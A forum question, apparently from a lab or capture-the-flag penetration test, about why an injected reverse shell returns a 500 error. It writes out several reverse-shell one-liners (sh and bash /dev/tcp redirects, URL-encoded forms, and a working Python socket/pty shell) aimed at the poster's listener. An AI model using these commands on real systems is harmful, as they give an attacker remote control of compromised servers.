# sh reverse shell used to work as of an hour ago but nowthe server returns 500 Internal Server Error. Please take a look at my GET request and response

Tags: linux, penetration-test, html

[image]

This is the reverse shell I'm using: `sh -i >& /dev/tcp/10.10.14.106/3000 0>&1` and URL encoded is `sh+-i+>%26+/dev/tcp/10.10.XX.XX/3000+0>%261+`

It used to work just fine and I'd catch the reverse shell with netcat. The port and IP are correct.

Simple commands like id and whoami both work so I know I can execute commands on the server.

I've tried other shells too (thank you revshells.com)

Anyone have any idea what is going wrong?

edit: `bash+-c+'bash+-i+>%26+/dev/tcp/10.10.XX.XX:3000+0>%261'` also doesn't work

edit 2: `python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.XX.XX",3000));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'` worked for me but I am puzzled why bash didn't work.

Comment: Please edit the question to limit it to a specific problem with enough detail to identify an adequate answer.

Comment: Look in the web server logs ?